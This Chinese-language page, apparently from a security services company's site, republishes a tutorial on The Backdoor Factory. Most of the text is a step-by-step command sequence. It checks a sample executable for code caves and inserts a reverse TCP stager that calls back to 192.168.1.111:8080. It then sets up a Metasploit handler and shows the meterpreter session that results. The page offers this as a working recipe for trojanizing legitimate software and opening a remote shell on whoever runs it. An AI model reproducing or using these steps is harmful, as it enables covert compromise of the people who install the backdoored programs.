The-Backdoor-Factory介绍_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

The-Backdoor-Factory介绍

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


The-Backdoor-Factory介绍

项目地址:https://github.com/secretsquirrel/the-backdoor-factory 原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来触发payload。 以项目中的过磅系统为例: 以项目中的过磅系统为例: root@John:~/Desktop# git clone https://github.com/secretsquirrel/the-backdoor-factory.git//安装the-backdoor-factory root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f~/demo/guobang.exe -S //检测是否支持后门植入 root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f~/demo/guobang.exe -c -l 150 //测试裂缝空间size150 root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -s show //查看可用payload root@John:~/Desktop/the-backdoor-factory#./backdoor.pyf~/demo/guobang.exe-H192.168.1.111-P8080-siat_reverse_tcp_stager_threaded //插入payload,并生成文件。 root@John:~/Desktop/the-backdoor-factory#md5sum ./guobang.exe/root/demo/guobang.exe //对比原文件与生成文件MD5值 root@John:~/Desktop/the-backdoor-factory#du-k ./guobang.exe/root/demo/guobang.exe //对比文件大小 msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.1.111 lhost => 192.168.1.111msf exploit(handler) > set lport 8080lport => 8080msf exploit(handler) > exploit -j //开启本地监听 //打开软件 meterpreter > getuidServer username: John-PCJohn //确定目标 文章来源:https://micropoor.blogspot.com/

The-Backdoor-Factory介绍